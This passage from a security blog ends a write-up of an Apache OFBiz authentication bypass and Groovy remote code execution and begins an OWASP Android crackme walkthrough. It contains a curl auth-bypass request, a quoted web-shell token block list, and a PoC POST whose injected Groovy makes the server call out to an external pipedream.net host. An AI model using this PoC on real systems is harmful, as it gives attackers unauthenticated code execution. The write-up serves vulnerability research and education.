class="mi">272</span><span class="o">:</span> <span class="mi">273</span><span class="o">:</span> <span class="nc">String</span> <span class="n">path</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getPathInfo</span><span class="o">();</span> <span class="mi">274</span><span class="o">:</span> <span class="nc">String</span> <span class="n">requestUri</span> <span class="o">=</span> <span class="n">getRequestUri</span><span class="o">(</span><span class="n">path</span><span class="o">);</span> <span class="mi">275</span><span class="o">:</span> <span class="nc">String</span> <span class="n">overrideViewUri</span> <span class="o">=</span> <span class="n">getOverrideViewUri</span><span class="o">(</span><span class="n">path</span><span class="o">);</span> <span class="mi">276</span><span class="o">:</span> <span class="mi">277</span><span class="o">:</span> <span class="nc">Collection</span><span class="o">&lt;</span><span class="nc">RequestMap</span><span class="o">&gt;</span> <span class="n">rmaps</span> <span class="o">=</span> <span class="n">resolveURI</span><span class="o">(</span><span class="n">ccfg</span><span class="o">,</span> <span class="n">request</span><span class="o">);</span> <span class="mi">278</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">rmaps</span><span class="o">.</span><span class="na">isEmpty</span><span class="o">())</span> <span class="o">{</span> <span class="o">.</span> <span class="o">.</span></code></pre></figure> <p><code class="language-plaintext highlighter-rouge">doRequest()</code> is the major function which handles the incoming HTTP Request.</p> <ul> <li> <p>The code starts with incoming request’s ServerName (host header) is in the hostHeadersAllowed list. If not, it logs an error and throws a RequestHandlerException.</p> </li> <li> <p>It then parses the <code class="language-plaintext highlighter-rouge">controller.xml</code> file to obtain the configuration (<code class="language-plaintext highlighter-rouge">ControllerConfig</code>) and sets up variables, such as the application name (cname), default request URI, and paths. A great way to debug how all these variables play a role is to setup a breakpoint at the <code class="language-plaintext highlighter-rouge">doRequest()</code> function and execute line by line printing variables and values.</p> </li> </ul> <div align="center"><img src="/images/2024/apache_ofbiz_runtime_debugging.png" alt="Apache OFBiz runtime debugging" width="750" /></div> <ul> <li>Further down, it checks if the resolved request maps (<code class="language-plaintext highlighter-rouge">rmaps</code>) collection is empty and then proceeds to handle the HTTP method.</li> </ul> <p>We can continue down this path until we find <code class="language-plaintext highlighter-rouge">securityAuth</code> which triggers the login flow:</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">482</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">requestMap</span><span class="o">.</span><span class="na">securityAuth</span><span class="o">)</span> <span class="o">{</span> <span class="mi">483</span><span class="o">:</span> <span class="c1">// Invoke the security handler</span> <span class="mi">484</span><span class="o">:</span> <span class="c1">// catch exceptions and throw RequestHandlerException if failed.</span> <span class="mi">485</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">Debug</span><span class="o">.</span><span class="na">verboseOn</span><span class="o">())</span> <span class="nc">Debug</span><span class="o">.</span><span class="na">logVerbose</span><span class="o">(</span><span class="s">"[RequestHandler]: AuthRequired. Running security check. "</span> <span class="o">+</span> <span class="n">showSessionId</span><span class="o">(</span><span class="n">request</span><span class="o">),</span> <span class="n">module</span><span class="o">);</span> <span class="mi">486</span><span class="o">:</span> <span class="nc">ConfigXMLReader</span><span class="o">.</span><span class="na">Event</span> <span class="n">checkLoginEvent</span> <span class="o">=</span> <span class="n">ccfg</span><span class="o">.</span><span class="na">getRequestMapMap</span><span class="o">().</span><span class="na">getFirst</span><span class="o">(</span><span class="s">"checkLogin"</span><span class="o">).</span><span class="na">event</span><span class="o">;</span> <span class="mi">487</span><span class="o">:</span> <span class="nc">String</span> <span class="n">checkLoginReturnString</span> <span class="o">=</span> <span class="kc">null</span><span class="o">;</span> <span class="mi">488</span><span class="o">:</span> <span class="mi">489</span><span class="o">:</span> <span class="k">try</span> <span class="o">{</span> <span class="mi">490</span><span class="o">:</span> <span class="n">checkLoginReturnString</span> <span class="o">=</span> <span class="k">this</span><span class="o">.</span><span class="na">runEvent</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">,</span> <span class="n">checkLoginEvent</span><span class="o">,</span> <span class="kc">null</span><span class="o">,</span> <span class="s">"security-auth"</span><span class="o">);</span> <span class="mi">491</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">EventHandlerException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">492</span><span class="o">:</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">RequestHandlerException</span><span class="o">(</span><span class="n">e</span><span class="o">.</span><span class="na">getMessage</span><span class="o">(),</span> <span class="n">e</span><span class="o">);</span> <span class="mi">493</span><span class="o">:</span> <span class="o">}</span> <span class="mi">494</span><span class="o">:</span> <span class="k">if</span> <span class="o">(!</span><span class="s">"success"</span><span class="o">.</span><span class="na">equalsIgnoreCase</span><span class="o">(</span><span class="n">checkLoginReturnString</span><span class="o">))</span> <span class="o">{</span> <span class="mi">495</span><span class="o">:</span> <span class="c1">// previous URL already saved by event, so just do as the return says...</span> <span class="mi">496</span><span class="o">:</span> <span class="n">eventReturn</span> <span class="o">=</span> <span class="n">checkLoginReturnString</span><span class="o">;</span> <span class="mi">497</span><span class="o">:</span> <span class="c1">// if the request is an ajax request we don't want to return the default login check</span> <span class="mi">498</span><span class="o">:</span> <span class="k">if</span> <span class="o">(!</span><span class="s">"XMLHttpRequest"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getHeader</span><span class="o">(</span><span class="s">"X-Requested-With"</span><span class="o">)))</span> <span class="o">{</span> <span class="mi">499</span><span class="o">:</span> <span class="n">requestMap</span> <span class="o">=</span> <span class="n">ccfg</span><span class="o">.</span><span class="na">getRequestMapMap</span><span class="o">().</span><span class="na">getFirst</span><span class="o">(</span><span class="s">"checkLogin"</span><span class="o">);</span> <span class="mi">500</span><span class="o">:</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="mi">501</span><span class="o">:</span> <span class="n">requestMap</span> <span class="o">=</span> <span class="n">ccfg</span><span class="o">.</span><span class="na">getRequestMapMap</span><span class="o">().</span><span class="na">getFirst</span><span class="o">(</span><span class="s">"ajaxCheckLogin"</span><span class="o">);</span> <span class="mi">502</span><span class="o">:</span> <span class="o">}</span> <span class="mi">503</span><span class="o">:</span> <span class="o">}</span> <span class="mi">504</span><span class="o">:</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="mi">505</span><span class="o">:</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">loginUris</span> <span class="o">=</span> <span class="nc">EntityUtilProperties</span><span class="o">.</span><span class="na">getPropertyValue</span><span class="o">(</span><span class="s">"security"</span><span class="o">,</span> <span class="s">"login.uris"</span><span class="o">,</span> <span class="n">delegator</span><span class="o">).</span><span class="na">split</span><span class="o">(</span><span class="s">","</span><span class="o">);</span> <span class="mi">506</span><span class="o">:</span> <span class="kt">boolean</span> <span class="n">removePreviousRequest</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span> <span class="mi">507</span><span class="o">:</span> <span class="k">for</span> <span class="o">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">loginUris</span><span class="o">.</span><span class="na">length</span><span class="o">;</span> <span class="n">i</span><span class="o">++)</span> <span class="o">{</span> <span class="mi">508</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">requestUri</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">loginUris</span><span class="o">[</span><span class="n">i</span><span class="o">]))</span> <span class="o">{</span> <span class="mi">509</span><span class="o">:</span> <span class="n">removePreviousRequest</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span> <span class="mi">510</span><span class="o">:</span> <span class="o">}</span> <span class="mi">511</span><span class="o">:</span> <span class="o">}</span> <span class="mi">512</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">removePreviousRequest</span><span class="o">)</span> <span class="o">{</span> <span class="mi">513</span><span class="o">:</span> <span class="c1">// Remove previous request attribute on navigation to non-authenticated request</span> <span class="mi">514</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">getSession</span><span class="o">().</span><span class="na">removeAttribute</span><span class="o">(</span><span class="s">"_PREVIOUS_REQUEST_"</span><span class="o">);</span> <span class="mi">515</span><span class="o">:</span> <span class="o">}</span> <span class="mi">516</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <ul> <li> <p>The code checks if <code class="language-plaintext highlighter-rouge">requestMap.securityAuth</code> is true, if so, it invokes a security handler named <code class="language-plaintext highlighter-rouge">checkLogin()</code>.</p> </li> <li> <p>The return value from the <code class="language-plaintext highlighter-rouge">checkLogin()</code> event is stored in <code class="language-plaintext highlighter-rouge">checkLoginReturnString</code> and if the return value is not <code class="language-plaintext highlighter-rouge">success</code> (case-insensitive), it indicates authentication failure.</p> </li> </ul> <p>This means if we are able to return <code class="language-plaintext highlighter-rouge">success</code> for checkLogin(), our request will continue ! We have already seen how to bypass the authentication in the first part of this article :)</p> <p>Let’s try and access the same path but this time using the authentication bypass we did above: <a href="https://localhost:8443/webtools/control/ping?USERNAME&amp;PASSWORD=&amp;requirePasswordChange=Y">https://localhost:8443/webtools/control/ping?USERNAME&amp;PASSWORD=&amp;requirePasswordChange=Y</a></p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">curl <span class="nt">--insecure</span> <span class="s2">"https://localhost:8443/webtools/control/ping?USERNAME&amp;PASSWORD=&amp;requirePasswordChange=Y"</span></code></pre></figure> <p>This time, rather than going to login page, the application will return <code class="language-plaintext highlighter-rouge">PONG</code> confirming that we have bypassed the authentication successfully !</p> <h2 id="remote-code-execution">Remote Code Execution</h2> <p>At the beginning of this article, we noticed <code class="language-plaintext highlighter-rouge">groovyScripts</code> directory, let’s explore the directory and see if it can help us getting RCE.</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webtools/groovyScripts/entity/ProgramExport.groovy</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"> <span class="mi">31</span><span class="o">:</span> <span class="nc">String</span> <span class="n">groovyProgram</span> <span class="o">=</span> <span class="kc">null</span> <span class="mi">32</span><span class="o">:</span> <span class="n">recordValues</span> <span class="o">=</span> <span class="o">[]</span> <span class="mi">33</span><span class="o">:</span> <span class="n">errMsgList</span> <span class="o">=</span> <span class="o">[]</span> <span class="mi">34</span><span class="o">:</span> <span class="mi">35</span><span class="o">:</span> <span class="k">if</span> <span class="o">(!</span><span class="n">parameters</span><span class="o">.</span><span class="na">groovyProgram</span><span class="o">)</span> <span class="o">{</span> <span class="mi">36</span><span class="o">:</span> <span class="n">groovyProgram</span> <span class="o">=</span> <span class="sc">'''</span> <span class="mi">37</span><span class="o">:</span> <span class="c1">// Use the List variable recordValues to fill it with GenericValue maps.</span> <span class="mi">38</span><span class="o">:</span> <span class="c1">// full groovy syntaxt is available</span> <span class="mi">39</span><span class="o">:</span> <span class="mi">40</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">org.apache.ofbiz.entity.util.EntityFindOptions</span> <span class="mi">41</span><span class="o">:</span> <span class="mi">42</span><span class="o">:</span> <span class="c1">// example:</span> <span class="mi">43</span><span class="o">:</span> <span class="mi">44</span><span class="o">:</span> <span class="c1">// find the first three record in the product entity (if any)</span> <span class="mi">45</span><span class="o">:</span> <span class="nc">EntityFindOptions</span> <span class="n">findOptions</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">EntityFindOptions</span><span class="o">()</span> <span class="mi">46</span><span class="o">:</span> <span class="n">findOptions</span><span class="o">.</span><span class="na">setMaxRows</span><span class="o">(</span><span class="mi">3</span><span class="o">)</span> <span class="mi">47</span><span class="o">:</span> <span class="mi">48</span><span class="o">:</span> <span class="nc">List</span> <span class="n">products</span> <span class="o">=</span> <span class="n">delegator</span><span class="o">.</span><span class="na">findList</span><span class="o">(</span><span class="s">"Product"</span><span class="o">,</span> <span class="kc">null</span><span class="o">,</span> <span class="kc">null</span><span class="o">,</span> <span class="kc">null</span><span class="o">,</span> <span class="n">findOptions</span><span class="o">,</span> <span class="kc">false</span><span class="o">)</span> <span class="mi">49</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">products</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="mi">50</span><span class="o">:</span> <span class="n">recordValues</span><span class="o">.</span><span class="na">addAll</span><span class="o">(</span><span class="n">products</span><span class="o">)</span> <span class="mi">51</span><span class="o">:</span> <span class="o">}</span> <span class="mi">52</span><span class="o">:</span> <span class="mi">53</span><span class="o">:</span> <span class="mi">54</span><span class="o">:</span> <span class="sc">'''</span> <span class="mi">55</span><span class="o">:</span> <span class="n">parameters</span><span class="o">.</span><span class="na">groovyProgram</span> <span class="o">=</span> <span class="n">groovyProgram</span> <span class="mi">56</span><span class="o">:</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="mi">57</span><span class="o">:</span> <span class="n">groovyProgram</span> <span class="o">=</span> <span class="n">parameters</span><span class="o">.</span><span class="na">groovyProgram</span> <span class="mi">58</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <p>The program starts with checking if a parameter named <code class="language-plaintext highlighter-rouge">groovyProgram</code> exists, if not a default value is provided.</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webtools/groovyScripts/entity/ProgramExport.groovy</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"> <span class="mi">71</span><span class="o">:</span> <span class="nc">ClassLoader</span> <span class="n">loader</span> <span class="o">=</span> <span class="nc">Thread</span><span class="o">.</span><span class="na">currentThread</span><span class="o">().</span><span class="na">getContextClassLoader</span><span class="o">()</span> <span class="mi">72</span><span class="o">:</span> <span class="n">def</span> <span class="n">shell</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">GroovyShell</span><span class="o">(</span><span class="n">loader</span><span class="o">,</span> <span class="n">binding</span><span class="o">,</span> <span class="n">configuration</span><span class="o">)</span> <span class="mi">73</span><span class="o">:</span> <span class="mi">74</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isNotEmpty</span><span class="o">(</span><span class="n">groovyProgram</span><span class="o">))</span> <span class="o">{</span> <span class="mi">75</span><span class="o">:</span> <span class="k">try</span> <span class="o">{</span> <span class="mi">76</span><span class="o">:</span> <span class="k">if</span> <span class="o">(!</span><span class="n">org</span><span class="o">.</span><span class="na">apache</span><span class="o">.</span><span class="na">ofbiz</span><span class="o">.</span><span class="na">security</span><span class="o">.</span><span class="na">SecuredUpload</span><span class="o">.</span><span class="na">isValidText</span><span class="o">(</span><span class="n">groovyProgram</span><span class="o">,[</span><span class="s">"import"</span><span class="o">]))</span> <span class="o">{</span> <span class="mi">77</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_ERROR_MESSAGE_"</span><span class="o">,</span> <span class="s">"Not executed for security reason"</span><span class="o">)</span> <span class="mi">78</span><span class="o">:</span> <span class="k">return</span> <span class="mi">79</span><span class="o">:</span> <span class="o">}</span> <span class="mi">80</span><span class="o">:</span> <span class="n">shell</span><span class="o">.</span><span class="na">parse</span><span class="o">(</span><span class="n">groovyProgram</span><span class="o">)</span> <span class="mi">81</span><span class="o">:</span> <span class="n">shell</span><span class="o">.</span><span class="na">evaluate</span><span class="o">(</span><span class="n">groovyProgram</span><span class="o">)</span> <span class="mi">82</span><span class="o">:</span> <span class="n">recordValues</span> <span class="o">=</span> <span class="n">shell</span><span class="o">.</span><span class="na">getVariable</span><span class="o">(</span><span class="s">"recordValues"</span><span class="o">)</span> <span class="mi">83</span><span class="o">:</span> <span class="n">xmlDoc</span> <span class="o">=</span> <span class="nc">GenericValue</span><span class="o">.</span><span class="na">makeXmlDocument</span><span class="o">(</span><span class="n">recordValues</span><span class="o">)</span> <span class="mi">84</span><span class="o">:</span> <span class="n">context</span><span class="o">.</span><span class="na">put</span><span class="o">(</span><span class="s">"xmlDoc"</span><span class="o">,</span> <span class="n">xmlDoc</span><span class="o">)</span> <span class="mi">85</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span><span class="o">(</span><span class="nc">MultipleCompilationErrorsException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">86</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_ERROR_MESSAGE_"</span><span class="o">,</span> <span class="n">e</span><span class="o">)</span> <span class="mi">87</span><span class="o">:</span> <span class="k">return</span> <span class="mi">88</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span><span class="o">(</span><span class="n">groovy</span><span class="o">.</span><span class="na">lang</span><span class="o">.</span><span class="na">MissingPropertyException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">89</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_ERROR_MESSAGE_"</span><span class="o">,</span> <span class="n">e</span><span class="o">)</span> <span class="mi">90</span><span class="o">:</span> <span class="k">return</span> <span class="mi">91</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span><span class="o">(</span><span class="nc">IllegalArgumentException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">92</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_ERROR_MESSAGE_"</span><span class="o">,</span> <span class="n">e</span><span class="o">)</span> <span class="mi">93</span><span class="o">:</span> <span class="k">return</span> <span class="mi">94</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span><span class="o">(</span><span class="nc">NullPointerException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">95</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_ERROR_MESSAGE_"</span><span class="o">,</span> <span class="n">e</span><span class="o">)</span> <span class="mi">96</span><span class="o">:</span> <span class="k">return</span> <span class="mi">97</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span><span class="o">(</span><span class="nc">Exception</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">98</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_ERROR_MESSAGE_"</span><span class="o">,</span> <span class="n">e</span><span class="o">)</span> <span class="mi">99</span><span class="o">:</span> <span class="k">return</span> <span class="mi">100</span><span class="o">:</span> <span class="o">}</span> <span class="mi">101</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <p>A <code class="language-plaintext highlighter-rouge">groovyShell</code> is initialised and eventually the parameter <code class="language-plaintext highlighter-rouge">groovyProgram</code> is passed onto groovy shell, effectively getting our code executed. An interesting thing to note is the usage of <code class="language-plaintext highlighter-rouge">org.apache.ofbiz.security.SecuredUpload.isValidText(groovyProgram,["import"])</code>, which is essentially taking our parameter and along with a second argument which is an array containing the string “import”.</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">100</span><span class="o">:</span> <span class="kd">private</span> <span class="kd">static</span> <span class="kd">final</span> <span class="nc">List</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">&gt;</span> <span class="no">DENIEDWEBSHELLTOKENS</span> <span class="o">=</span> <span class="n">deniedWebShellTokens</span><span class="o">();</span> <span class="o">.</span> <span class="o">.</span> <span class="mi">623</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="nf">isValidText</span><span class="o">(</span><span class="nc">String</span> <span class="n">content</span><span class="o">,</span> <span class="nc">List</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">&gt;</span> <span class="n">allowed</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span> <span class="mi">624</span><span class="o">:</span> <span class="k">return</span> <span class="no">DENIEDWEBSHELLTOKENS</span><span class="o">.</span><span class="na">stream</span><span class="o">().</span><span class="na">allMatch</span><span class="o">(</span><span class="n">token</span> <span class="o">-&gt;</span> <span class="n">isValid</span><span class="o">(</span><span class="n">content</span><span class="o">,</span> <span class="n">token</span><span class="o">,</span> <span class="n">allowed</span><span class="o">));</span> <span class="mi">625</span><span class="o">:</span> <span class="o">}</span> <span class="o">.</span> <span class="o">.</span> <span class="mi">644</span><span class="o">:</span> <span class="kd">private</span> <span class="kd">static</span> <span class="nc">List</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">&gt;</span> <span class="nf">deniedWebShellTokens</span><span class="o">()</span> <span class="o">{</span> <span class="mi">645</span><span class="o">:</span> <span class="nc">String</span> <span class="n">deniedTokens</span> <span class="o">=</span> <span class="nc">UtilProperties</span><span class="o">.</span><span class="na">getPropertyValue</span><span class="o">(</span><span class="s">"security"</span><span class="o">,</span> <span class="s">"deniedWebShellTokens"</span><span class="o">);</span> <span class="mi">646</span><span class="o">:</span> <span class="k">return</span> <span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isNotEmpty</span><span class="o">(</span><span class="n">deniedTokens</span><span class="o">)</span> <span class="o">?</span> <span class="nc">StringUtil</span><span class="o">.</span><span class="na">split</span><span class="o">(</span><span class="n">deniedTokens</span><span class="o">,</span> <span class="s">","</span><span class="o">)</span> <span class="o">:</span> <span class="k">new</span> <span class="nc">ArrayList</span><span class="o">&lt;&gt;();</span> <span class="mi">647</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <p>isValidText() internally called <code class="language-plaintext highlighter-rouge">DENIEDWEBSHELLTOKENS.stream()</code> which is nothing but <code class="language-plaintext highlighter-rouge">deniedWebShellTokens()</code> function which seems to be returning based on some pre-defined property value.</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/security/config/security.properties</em></p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">deniedWebShellTokens</span><span class="o">=</span>freemarker,import<span class="o">=</span><span class="se">\"</span>java,runtime.getruntime<span class="o">()</span>.exec<span class="o">(</span>,&lt;%@ page,&lt;script,&lt;body&gt;,&lt;form,php,javascript,%eval,@eval,import os,passthru,exec,shell_exec,assert,str_rot13,system,phpinfo,base64_decode,chmod,mkdir,fopen,fclose,new file,import,upload,getfilename,download,getoutputstring,readfile</code></pre></figure> <p>This is a simple blacklist based filtering, bypassing which will give us direct code execution.</p> <h2 id="poc">POC</h2> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">curl <span class="nt">-vv</span> <span class="nt">-X</span> POST <span class="s2">"https://localhost:8443/webtools/control/ProgramExport?USERNAME&amp;PASSWORD=test&amp;requirePasswordChange=Y"</span> <span class="nt">-d</span> <span class="s1">'groovyProgram=def%20result%20%3D%20%22curl%20https%3A%2F%2Fen3d5squ4eacq.x.pipedream.net%22.execute().text%3B'</span> <span class="nt">--insecure</span></code></pre></figure> <h2 id="references">References:</h2> <ol> <li> <p><a href="https://subscription.packtpub.com/book/programming/9781847199188/1/ch01lvl1sec10/locating-an-ofbiz-component" target="_blank">packtpub</a></p> </li> <li> <p><a href="https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/" target="_blank">y4tacker.github.io</a></p> </li> </ol> Mon, 26 Feb 2024 00:00:00 -0800 https://blog.0daylabs.com/2024/02/26/apache-ofbiz-authbypass-rce/ https://blog.0daylabs.com/2024/02/26/apache-ofbiz-authbypass-rce/ java Dive deep into Android Application Security - OWASP MSTG Uncrackable level 1 writeup <h2 id="introduction">Introduction</h2> <p>Android is the most popular mobile operating system with over 85% in market share and as a result it’s important to look into the security aspects of the same as well. <a href="https://github.com/OWASP/owasp-mstg/" target="_blank">Mobile Security Testing Guide</a> (MSTG) is one of the Flagship OWASP project which is a comprehensive manual for mobile app security development, testing and reverse engineering. The authors of MSTG have created some crackme’s for both Android and iOS platform using which we can dive deep into the application security of the respective platforms. In this article, we will focus on solving <a href="https://github.com/OWASP/owasp-mstg/raw/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk" target="_blank">uncrackable level 1</a> for Android.</p> <p>Let’s install the APK in an emulator and see how it works. I am using genymotion personal license with Google Nexus 5 (6.0 - API 23) device.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span>adb devices List of devices attached 192.168.56.102:5555 device <span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span>adb <span class="nb">install </span>UnCrackable-Level1.apk Performing Push Install UnCrackable-Level1.apk: 1 file pushed. 22.7 MB/s <span class="o">(</span>66651 bytes <span class="k">in </span>0.003s<span class="o">)</span> pkg: /data/local/tmp/UnCrackable-Level1.apk Success</code></pre></figure> <p>If we run the application, it detects the root access to the device and exit immediately. Root detection is one of the common techniques developers use to prevent installing their applications on the rooted device. Let’s decompile the APK and look into the source code to see if we can bypass this.</p> <h2 id="decompiling-into-java-source-code">Decompiling into Java Source code</h2> <p>One of the tools used to decompile the APK into java source code is <a href="https://github.com/skylot/jadx" target="_blank">Jadx</a>.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span><span class="nb">ls </span>UnCrackable-Level1.apk <span class="o">[</span>anirudhanand@Android]<span class="nv">$ </span>jadx UnCrackable-Level1.apk INFO - output directory: UnCrackable-Level1 INFO - loading ... INFO - Can<span class="s1">'t find '</span>R<span class="s1">' class in app package: owasp.mstg.uncrackable1 INFO - App '</span>R<span class="s1">' class not found, put all resources ids to : '</span>owasp.mstg.uncrackable1.R<span class="s1">' INFO - processing ... WARNING: An illegal reflective access operation has occurred WARNING: Illegal reflective access by com.rits.cloning.Cloner (file:/usr/local/Cellar/jadx/1.0.0/libexec/lib/cloning-1.9.12.jar) to field java.util.TreeSet.m WARNING: Please consider reporting this to the maintainers of com.rits.cloning.Cloner WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations WARNING: All illegal access operations will be denied in a future release INFO - done</span></code></pre></figure> <p>We can see the source code on <code class="language-plaintext highlighter-rouge">./UnCrackable-Level1/sources/sg/vantagepoint/uncrackable1</code> where <code class="language-plaintext highlighter-rouge">MainActivity.java</code> has been decompiled successfully by the Jadx.</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">10</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">android.widget.EditText</span><span class="o">;</span> <span class="mi">11</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">owasp.mstg.uncrackable1.R</span><span class="o">;</span> <span class="mi">12</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">sg.vantagepoint.a.b</span><span class="o">;</span> <span class="mi">13</span><span class="o">:</span> <span class="kn">import</span> <span class="nn">sg.vantagepoint.a.c</span><span class="o">;</span> <span class="mi">14</span><span class="o">:</span> <span class="mi">15</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">MainActivity</span> <span class="kd">extends</span> <span class="nc">Activity</span> <span class="o">{</span> <span class="mi">16</span><span class="o">:</span> <span class="kd">private</span> <span class="kt">void</span> <span class="nf">a</span><span class="o">(</span><span class="nc">String</span> <span class="n">str</span><span class="o">)</span> <span class="o">{</span> <span class="mi">17</span><span class="o">:</span> <span class="nc">AlertDialog</span> <span class="n">create</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Builder</span><span class="o">(</span><span class="k">this</span><span class="o">).</span><span class="na">create</span><span class="o">();</span> <span class="mi">18</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">setTitle</span><span class="o">(</span><span class="n">str</span><span class="o">);</span> <span class="mi">19</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">setMessage</span><span class="o">(</span><span class="s">"This is unacceptable. The app is now going to exit."</span><span class="o">);</span> <span class="mi">20</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">setButton</span><span class="o">(-</span><span class="mi">3</span><span class="o">,</span> <span class="s">"OK"</span><span class="o">,</span> <span class="k">new</span> <span class="nc">OnClickListener</span><span class="o">()</span> <span class="o">{</span> <span class="mi">21</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">onClick</span><span class="o">(</span><span class="nc">DialogInterface</span> <span class="n">dialogInterface</span><span class="o">,</span> <span class="kt">int</span> <span class="n">i</span><span class="o">)</span> <span class="o">{</span> <span class="mi">22</span><span class="o">:</span> <span class="nc">System</span><span class="o">.</span><span class="na">exit</span><span class="o">(</span><span class="mi">0</span><span class="o">);</span> <span class="mi">23</span><span class="o">:</span> <span class="o">}</span> <span class="mi">24</span><span class="o">:</span> <span class="o">});</span> <span class="mi">25</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">setCancelable</span><span class="o">(</span><span class="kc">false</span><span class="o">);</span> <span class="mi">26</span><span class="o">:</span> <span class="n">create</span><span class="o">.</span><span class="na">show</span><span class="o">();</span> <span class="mi">27</span><span class="o">:</span> <span class="o">}</span> <span class="mi">28</span><span class="o">:</span> <span class="mi">29</span><span class="o">:</span> <span class="cm">/* access modifiers changed from: protected */</span> <span class="mi">30</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">onCreate</span><span class="o">(</span><span 